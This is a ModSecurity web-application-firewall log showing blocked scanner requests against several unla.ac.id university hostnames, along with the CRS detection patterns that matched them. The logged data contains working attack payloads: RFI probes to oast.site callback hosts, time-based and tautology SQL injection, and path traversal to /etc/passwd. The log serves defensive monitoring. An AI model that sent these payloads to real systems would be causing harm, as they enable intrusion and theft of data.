[Tue Aug 29 11:35:06.354697 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg67pm1ug6noeyj.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlg67pm1ug6noeyj.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUGZAoAAAA@"]
[Tue Aug 29 11:35:06.375940 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgpw8q533bo9kgx.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgpw8q533bo9kgx.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAT9PP0AAAA1"]
[Tue Aug 29 11:35:06.376778 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgzj6zcg4hoki19.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgzj6zcg4hoki19.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUZcGcAAABO"]
[Tue Aug 29 11:35:06.384587 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgj8oxhbiurno7u.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgj8oxhbiurno7u.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAASPDNgAAAAS"]
[Tue Aug 29 11:35:07.303627 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgsczo7mwjxjhgj.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgsczo7mwjxjhgj.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11e8Co-f0AAATzVJgAAAAx"]
[Tue Aug 29 11:35:07.310172 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVRxdAAAAAQ"]
[Tue Aug 29 11:35:07.320326 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAATQXikAAAAO"]
[Tue Aug 29 11:35:07.322432 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAUNalwAAABF"]
[Tue Aug 29 11:35:07.323598 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVWP-UAAAAV"]
[Tue Aug 29 11:35:07.324946 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVQYyUAAAAI"]
[Tue Aug 29 11:35:07.333234 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAASOUqYAAAAR"]
[Tue Aug 29 11:35:07.336319 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAULx9QAAABD"]
[Tue Aug 29 11:35:07.336426 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAUGZAwAAAA@"]
[Tue Aug 29 11:35:07.336650 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAT9PP8AAAA1"]
[Tue Aug 29 11:35:07.339829 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAASEJYwAAAAE"]
[Tue Aug 29 11:35:08.310960 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fMCo-f0AAAVRxdIAAAAQ"]
[Tue Aug 29 11:35:08.313595 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAATOA@4AAAAH"]
[Tue Aug 29 11:35:08.319294 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAT2JRwAAAAz"]
[Tue Aug 29 11:35:08.354536 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAVJXlMAAAAA"]
[Tue Aug 29 11:35:08.357930 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11fMCo-f0AAAUNal4AAABF"]
[Tue Aug 29 11:35:08.358894 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAATSkokAAAAT"]
[Tue Aug 29 11:35:08.382243 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAPLwKoAAAAX"]
[Tue Aug 29 11:35:09.343017 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAARdiTwAAAAK"]
[Tue Aug 29 11:35:09.354034 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAATge7QAAAAl"]
[Tue Aug 29 11:35:09.354644 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAVK0IQAAAAB"]
[Tue Aug 29 11:35:09.358084 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAVQYygAAAAI"]
[Tue Aug 29 11:35:09.363017 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAATzVJwAAAAx"]
[Tue Aug 29 11:35:10.304244 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fsCo-f0AAAVPX3cAAAAF"]
